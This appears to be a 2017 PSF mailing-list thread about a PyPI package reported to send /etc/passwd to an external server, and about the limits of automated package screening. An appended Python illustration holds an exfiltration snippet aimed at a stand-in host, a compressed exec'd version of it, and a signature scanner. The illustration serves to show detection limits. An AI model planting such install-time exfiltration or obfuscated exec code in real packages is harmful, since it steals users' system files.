This is not a solvable problem. IMNSHO we should never attempt to implement
pre-screening of packages.

It is a good post-package-upload task for someone to try and do as a
research project.

Automated code scanning can only find already known things and similar
signatures (at which point it can have false positives), and we aren't just
talking about obfuscated source code.  PyPI hosts binary wheels made using
unreproducible build processes on untrusted machines created from
unverifiable inputs.  Scanning services such as Google's
https://www.virustotal.com/en/about/ exist, but I'm not sure that'd be of
much value to PyPI.

-gps

On Thu, May 4, 2017 at 7:28 PM Ryan Birmingham <rainventi...@gmail.com>
wrote:

> I'm not sure what effective package review would look like here. Perhaps
> we could establish an entity to screen packages on an opt-in basis, but I
> don't know if we have the resources/people for this. Automated code
> screening could and probably would miss the `python-nation` example due to
> the unorthodox use of compressed instructions.
> Does anyone have any ideas?
>
> -Ryan Birmingham
>
> On 4 May 2017 at 20:08, Bruno Rocha <rochacbr...@gmail.com> wrote:
>
>> Interesting detail, the mentioned package
>> https://pypi.python.org/pypi/python-nation/1.0.1 was created and
>> uploaded by Jacob Kaplan Moss, so I guess this is intended to be a POC, to
>> show PyPI vulnerabilities or some Infosec experiment.
>>
>> On Thu, May 4, 2017 at 8:41 PM, Bruno Rocha <rochacbr...@gmail.com>
>> wrote:
>>
>>> Hi,
>>>
>>> I just read this on reddit[0], a thread asking if PyPI packages are
>>> audited, and somebody pointed to `python-nation`[1], which is a harmful and
>>> useless module that installs itself and sends the `/etc/passwd` content to
>>> an external endpoint.
>>>
>>> The app receiving the data is hosted at
>>> http://python-nation.herokuapp.com
>>>
>>> and as the PSF mission [2] says
>>>
>>> The mission of the Python Software Foundation is to promote, protect,
>>> and advance the Python programming language
>>>
>>> I wonder if there is some workgroup at PSF to handle this, and not only
>>> the specific case of `python-nation` (which should be deleted and the user
>>> banned, maybe), but also to handle the audit of other packages?
>>>
>>>
>>> [0]
>>> https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/
>>> [1]
>>> https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/dh4uyf8/
>>> [2] https://www.python.org/psf/mission/
>>>
>>>
>>> Cheers,
>>>
>>> --
>>>
>>> *Bruno Rocha - @rochacbruno <http://twitter.com/rochacbruno>*
>>> http://brunorocha.org
>>>
>>>
>>
>>
>> --
>>
>> *Bruno Rocha - @rochacbruno <http://twitter.com/rochacbruno>*
>> http://brunorocha.org
>>
>>
>> _______________________________________________
>> PSF-Community mailing list
>> PSF-Community@python.org
>> https://mail.python.org/mailman/listinfo/psf-community
>>
>>
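As an added illustration of the limits the thread describes (example code, not from the thread, PyPI, or the python-nation package): a toy AST-based signature scanner run over three constructed setup.py fragments. It catches the plain variant, sees only a bare exec() in the compressed variant Ryan mentions, and raises that same alert on a harmless version-file idiom, which is exactly the miss-plus-false-positive pattern Gregory points out. The module names, paths and endpoint are constructed for the example.

```python
import ast
import base64
import zlib

# Constructed sample 1: install-time code doing what the thread describes
# (read /etc/passwd, send it to an external endpoint). Inert here: never executed.
PLAIN = """
import urllib.request
data = open('/etc/passwd').read()
urllib.request.urlopen('http://collector.invalid/', data=data.encode())
"""

# Constructed sample 2: the same behaviour hidden behind compressed, exec'd bytes
# ("compressed instructions"). Statically, only the exec() call is visible.
OBFUSCATED = "import zlib, base64\nexec(zlib.decompress(base64.b64decode(%r)))" % (
    base64.b64encode(zlib.compress(PLAIN.encode())).decode())

# Constructed sample 3: a common, harmless setup.py idiom for reading a version file.
BENIGN = "exec(open('mypkg/_version.py').read())"

SENSITIVE_PATHS = {"/etc/passwd", "/etc/shadow"}
NETWORK_MODULES = {"urllib", "requests", "socket", "http"}


def scan_source(src):
    """Return a sorted list of signature hits found by walking the AST of src."""
    hits = set()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Constant) and node.value in SENSITIVE_PATHS:
            hits.add("sensitive-path:" + node.value)
        elif isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    hits.add("network-import:" + alias.name.split(".")[0])
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in NETWORK_MODULES:
                hits.add("network-import:" + node.module.split(".")[0])
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in ("exec", "eval"):
                hits.add("dynamic-exec:" + node.func.id)
    return sorted(hits)


if __name__ == "__main__":
    for label, src in (("plain", PLAIN), ("obfuscated", OBFUSCATED), ("benign", BENIGN)):
        print(label, scan_source(src))
```

The obfuscated and benign fragments produce identical findings, so a reviewer can neither block on the exec() signature without breaking legitimate packages nor rely on it to catch the compressed variant.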